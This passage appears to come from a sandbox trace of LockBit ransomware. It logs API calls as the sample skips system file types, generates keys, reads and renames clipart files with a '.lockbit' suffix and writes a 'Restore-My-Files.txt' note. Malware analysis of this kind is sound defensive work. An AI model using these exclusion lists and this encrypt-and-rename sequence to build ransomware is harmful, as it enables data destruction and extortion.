(lpString1=".adv", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.602] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.603] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086428.WMF") returned 1 [0120.604] lstrcmpiW (lpString1="ntldr", lpString2="J0086428.WMF") returned 1 [0120.604] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086428.WMF") returned 1 [0120.604] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086428.WMF") returned -1 [0120.604] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086428.WMF") returned -1 [0120.604] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086428.WMF") returned 1 [0120.604] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086428.WMF") returned -1 [0120.604] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.604] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned=".WMF" [0120.604] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.604] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.604] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.605] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.605] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.lockbit") returned 72 [0120.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0120.609] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.609] malloc (_Size=0x40068) returned 0x3df0008 [0120.609] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=35346) returned 1 [0120.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.610] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.612] malloc (_Size=0xa6) returned 0x77d7a8 [0120.612] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.613] free (_Block=0x77d7a8) [0120.613] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.613] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.613] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x829a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086432.WMF", cAlternateFileName="")) returned 1 [0120.613] lstrcmpiW (lpString1=".", lpString2="J0086432.WMF") returned -1 [0120.613] lstrcmpiW (lpString1="..", lpString2="J0086432.WMF") returned -1 [0120.613] PathFindExtensionW (pszPath="J0086432.WMF") returned=".WMF" [0120.613] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.613] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.614] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.614] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.615] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086432.WMF") returned 1 [0120.615] lstrcmpiW (lpString1="ntldr", lpString2="J0086432.WMF") returned 1 [0120.615] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086432.WMF") returned 1 [0120.615] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086432.WMF") returned -1 [0120.616] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086432.WMF") returned -1 [0120.616] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086432.WMF") returned 1 [0120.616] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086432.WMF") returned -1 [0120.616] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.616] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned=".WMF" [0120.616] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.616] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.616] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.617] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.617] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.lockbit") returned 72 [0120.617] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0120.617] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.617] malloc (_Size=0x40068) returned 0x3d70450 [0120.618] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=33434) returned 1 [0120.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0120.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0120.619] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.625] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.625] malloc (_Size=0xa6) returned 0x77d7a8 [0120.625] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.633] free (_Block=0x77d7a8) [0120.633] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.633] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.633] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.633] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086478.WMF", cAlternateFileName="")) returned 1 [0120.633] lstrcmpiW (lpString1=".", lpString2="J0086478.WMF") returned -1 [0120.633] lstrcmpiW (lpString1="..", lpString2="J0086478.WMF") returned -1 [0120.634] PathFindExtensionW (pszPath="J0086478.WMF") returned=".WMF" [0120.634] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.634] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.635] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.635] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086478.WMF") returned 1 [0120.635] lstrcmpiW (lpString1="ntldr", lpString2="J0086478.WMF") returned 1 [0120.635] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086478.WMF") returned 1 [0120.635] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086478.WMF") returned -1 [0120.635] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086478.WMF") returned -1 [0120.635] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086478.WMF") returned 1 [0120.635] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086478.WMF") returned -1 [0120.636] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.636] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned=".WMF" [0120.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.636] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.637] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.637] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.637] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.lockbit") returned 72 [0120.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, 